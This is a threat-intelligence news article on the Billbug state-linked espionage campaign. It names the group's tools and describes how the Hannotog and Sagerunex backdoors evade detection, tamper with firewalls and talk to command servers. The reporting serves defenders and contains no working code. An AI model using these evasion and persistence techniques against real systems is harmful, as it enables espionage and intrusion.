Network Security
Vulnerability Management
Privileged Access Management
Endpoint Security
Threat Hunting
Unified Endpoint Management
Email & Collaboration Security
Contents:
The threat actor called Billbug (a.k.a. Thrip, Lotus Blossom, Spring Dragon) is responsible for a campaign that targeted a certificate authority, government agencies, and defense organizations in multiple countries in Asia.
It is believed that the hacking group, which has been operating since 2009, is a state-sponsored group working for China.
Details about the Campaign
Symantec reports that this current campaign is active since at least March 2022. Billbug also targeted a certificate authority company which would have made their moves harder to detect.
The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines. It could also potentially use compromised certificates to intercept HTTPS traffic.
Although it is not clear how the advanced persistent threat (APT) group gained initial access for their attacks, they seem to have exploited public-facing apps with known flaws.
Between them are the following:
- AdFind
- Winmail
- WinRAR
- Ping
- Tracert
- Route
- NBTscan
- Certutil
- Port Scanner
Billbug uses in its attacks a mix of tools from the targeted system, free utilities, and personalized malware. This mix makes the group’s attacks harder to trace by integrating its moves into common activities without leaving traces or raising cybersecurity alarms.
In recent operations, the threat actor also deployed an open-source tool called Stowaway. This Go-based multi-level proxy is designed to bypass network access filters.
Details about Used Malware
Billbug used multiple times two custom backdoors that suffered minor variations in the past years: Hannotog and Sagerunex.
Hannotog backdoor is used to temper with settings of the firewall in order to allow all traffic. The malware can then persist on the compromised machine, upload encrypted data, execute CMD commands, and download files to the device.
Sagerunex is dropped by Hannotog and injects itself in an “explorer.exe” process. It then writes logs on a local temp file encrypted using the AES algorithm (256-bit).
The backdoor’s configuration and state are also stored locally and encrypted with RC4, with the keys for both being hardcoded into the malware.
Sagerunex uses HTTPS to connect to the C2 server in order to send a list of active proxies and files and receive payloads and shell commands from hackers. It can also use “runexe” and “rundll” to implement software and DLLs.
If you liked this article, follow us on LinkedIn, Twitter, Facebook, YouTube, and Instagram for more cybersecurity news and topics.
